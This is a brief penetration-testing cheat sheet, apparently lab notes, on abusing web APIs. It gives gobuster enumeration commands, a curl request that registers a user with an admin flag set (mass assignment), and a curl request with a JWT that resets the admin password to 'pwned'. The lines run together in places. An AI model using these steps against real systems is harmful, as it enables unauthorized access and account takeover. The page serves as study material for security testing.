π»Abusing APIs
/api_name/v1{GOBUSTER}/v1
{GOBUSTER}/v2gobuster dir -u http://<ip> -w /usr/share/wordlists/dirb/big.txt -p patterncurl -i http://<ip>/users/v1gobuster dir -u http://<ip>/users/v1/admin/ -w /usr/share/wordlists/dirb/small.txtcurl -d '{"password":"fake","username":"admin"}' -H 'Content-Type: application/json' http://<ip>/users/v1/logincurl -d '{"password":"lab","username":"admin","email":"admin@htb.com","admin":"True"}' -H 'Content-Type: application/json' http://<ip>/users/v1/registercurl \
'http://<ip>/users/v1/admin/password' \
-H 'Content-Type: application/json' \
-H 'Authorization: OAuth eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDkyNzEyMDEsImlhdCI6MTY0OTI3MDkwMSwic3ViIjoib2Zmc2VjIn0.MYbSaiBkYpUGOTH-tw6ltzW0jNABCDACR3_FdYLRkew' \
-d '{"password": "pwned"}'Last updated